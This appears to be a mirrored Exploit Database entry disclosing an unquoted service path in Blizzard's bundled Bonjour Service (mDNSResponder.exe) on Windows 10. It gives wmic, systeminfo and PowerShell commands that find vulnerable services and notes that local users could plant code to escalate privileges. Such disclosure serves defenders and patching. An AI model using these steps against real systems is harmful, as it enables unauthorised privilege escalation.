Bonjour Service ‘mDNSResponder.exe’ – Unquoted Service Path Privilege Escalation

• Exploit Database
• 955 阅读

• 作者： bios
  日期： 2024-07-16
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/52061/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35

  # Exploit Title: Bonjour Service - 'mDNSResponder.exe'Unquoted Service Path # Discovery by: bios # Discovery Date: 2024-15-07 # Vendor Homepage: https://developer.apple.com/bonjour/ # Tested Version: 3,0,0,10 # Vulnerability Type: Unquoted Service Path # Tested on OS: Microsoft Windows 10 Home   # Step to discover Unquoted Service Path:   C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ Bonjour Service Bonjour Service C:\Program Files\Blizzard\Bonjour Service\mDNSResponder.exe Auto   C:\>systeminfo   Host Name: DESKTOP-HFBJOBG OS Name: Microsoft Windows 10 Home OS Version:10.0.19045 N/A Build 19045   PS C:\Program Files\Blizzard\Bonjour Service> powershell -command "(Get-Command .\mDNSResponder.exe).FileVersionInfo.FileVersion" >> 3,0,0,10   #Exploit:   There is an Unquoted Service Path in Bonjour Services (mDNSResponder.exe) . This may allow an authorized local user to insert arbitrary code into the unquoted service path and escalate privileges.